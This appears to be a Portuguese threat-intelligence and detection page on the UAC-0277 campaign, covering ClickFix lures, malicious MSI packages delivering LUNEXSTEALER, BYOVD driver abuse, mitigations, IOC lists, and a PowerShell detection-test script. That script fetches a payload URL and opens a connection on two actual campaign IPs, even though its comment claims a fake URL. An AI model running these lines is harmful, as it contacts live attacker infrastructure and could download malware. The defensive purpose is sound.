Ataques UAC-0277 Entregam LUNEXSTEALER via MSI Malicioso e ClickFix
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Os atores de ameaça rastreados como UAC-0277 estão comprometendo sites legítimos para injetar JavaScript malicioso que atrai os usuários a executar comandos por meio de uma página falsa de verificação do Cloudflare. Esta técnica ClickFix, em última análise, entrega pacotes MSI contendo LUNEXSTEALER ou carregadores adicionais que utilizam BYOVD para escapar dos controles de segurança. A campanha também utiliza infraestrutura de comando e controle baseada em blockchain no Polygon e Ethereum para gerenciar dinamicamente recursos dos atacantes.
Investigação
CERT-UA identificou mais de 100 sites comprometidos e analisou três variantes de MSI associadas à campanha. Os pesquisadores observaram o carregamento de DLL secundárias envolvendo FnHotkeyUtility.exe e a exploração do driver vulnerável AMD PDFWKRNL.sys para contornar as proteções do Windows Defender. A investigação também revelou a extensão de navegador LUNARAXE e o componente PowerShell NAIVEMESS utilizados para coletar e exfiltrar dados.
Mitigação
Os administradores devem restringir o acesso à caixa de diálogo Executar (Win+R) por meio da Política de Grupo e limitar os privilégios de instalação MSI a usuários autorizados. Ativar a Lista de Bloqueio de Drivers Vulneráveis da Microsoft é essencial para reduzir o risco de ataques BYOVD. As organizações também devem impor listas de permissão para extensões de navegador e monitorar atividades suspeitas da linha de comando msiexec.exe envolvendo URLs remotas.
Resposta
Quando a execução suspeita de MSI ou extensões de navegador não autorizadas forem detectadas, isole o host afetado e termine os processos associados ao LUNEXSTEALER. Revise as tarefas agendadas para entradas nomeadas psychedelicloveUtils e inspecione perfis de navegador para a extensão Microsoft Office Word Editor. Qualquer página falsa de verificação do Cloudflare associada à campanha deve ser reportada ao CERT-UA.
Fluxo de Ataque
Detecções
Entrada Suspeita no RunMRU Com Semântica LOLBin (via registry_event)
Possível Tentativa Remota de Instalação de Arquivo MSI (via cmdline)
Tarefa Agendada Suspeita (via audit)
Download de Arquivo Direto Via IP Suspeito (via proxy)
Comando e Controle Suspeito por Solicitação de DNS com Domínio de Nível Superior (TLD) Incomum (via dns)
IOCs (HashSha256) para detectar: Campanha UAC-0277: Implantação Maliciosa de MSI via Técnica ClickFix e Malware LUNEXSTEALER Parte 2
IOCs (HashSha256) para detectar: Campanha UAC-0277: Implantação Maliciosa de MSI via Técnica ClickFix e Malware LUNEXSTEALER Parte 1
IOCs (HashMd5) para detectar: Campanha UAC-0277: Implantação Maliciosa de MSI via Técnica ClickFix e Malware LUNEXSTEALER Parte 2
IOCs (HashMd5) para detectar: Campanha UAC-0277: Implantação Maliciosa de MSI via Técnica ClickFix e Malware LUNEXSTEALER Parte 1
IOCs (SourceIP) para detectar: Campanha UAC-0277: Implantação Maliciosa de MSI via Técnica ClickFix e Malware LUNEXSTEALER
IOCs (DestinationIP) para detectar: Campanha UAC-0277: Implantação Maliciosa de MSI via Técnica ClickFix e Malware LUNEXSTEALER
Detectar Interação com Servidores C2 Maliciosos Usando HTTP e WebSocket [Conexão de Rede do Windows]
FnHotkeyUtility Executando spkvol.dll Malicioso via Carregamento de DLL [Windows Sysmon]
Download de Pacote MSI Malicioso usando Msiexec e Exploração de Vulnerabilidade [Criação de Processo no Windows]
Detectar JavaScript Malicioso em Sites Comprometidos [Servidor Web]
Execução de Simulação
-
Narrativa do Ataque & Comandos: O adversário realizou com sucesso um comprometimento drive-by. Para estabelecer persistência e baixar o próximo estágio do malware, o agente implantado tenta buscar um arquivo chamado
psychedeliclove.exea partir de um URI específico. Simultaneamente, o agente tenta sinalizar para um nó C2 secundário localizado em193.178.159.128na porta8080para receber instruções via uma conexão HTTP semelhante ao WebSocket. Estes indicadores específicos são destinados a acionar as regras de detecção baseadas em proxy existentes. -
Script de Teste de Regressão:
# Script de Simulação para Validação de Detecção # Propósito: Acionar os indicadores específicos de URL e IP/Porta na regra de detecção. Write-Host "[*] Iniciando Simulação..." -ForegroundColor Cyan # 1. Selecione o Trigger 1: Padrão de URL Malicioso Write-Host "[*] Tentando acessar o padrão de URL malicioso..." -ForegroundColor Yellow try { # Usamos um listener local inexistente ou um URL falso para garantir que não acessemos de fato um site malicioso real, # mas o proxy ainda deve registrar a tentativa de solicitação. Invoke-WebRequest -Uri "http://107.175.82.242:9000/wilow/psychedeliclove.exe" -ErrorAction SilentlyContinue } catch { Write-Host "[!] Solicitação falhou (esperado), mas a telemetria deve ser gerada." -ForegroundColor Gray } # 2. Selecione o Trigger 2: IP e Porta Específicos Write-Host "[*] Tentando conectar ao IP C2 na porta 8080..." -ForegroundColor Yellow try { $client = New-Object System.Net.Sockets.TcpClient $client.Connect("193.178.159.128", 8080) $client.Close() } catch { Write-Host "[!] Conexão falhou (esperado), mas os logs do proxy devem capturar a tentativa." -ForegroundColor Gray } Write-Host "[*] Simulação Completa." -ForegroundColor Cyan -
Comandos de Limpeza:
# Nenhum arquivo persistente é criado por esta simulação. # Apenas tentativas de conexões de rede temporárias são feitas. Write-Host "[*] Limpeza completa. Nenhum artefato deixado no sistema." -ForegroundColor Green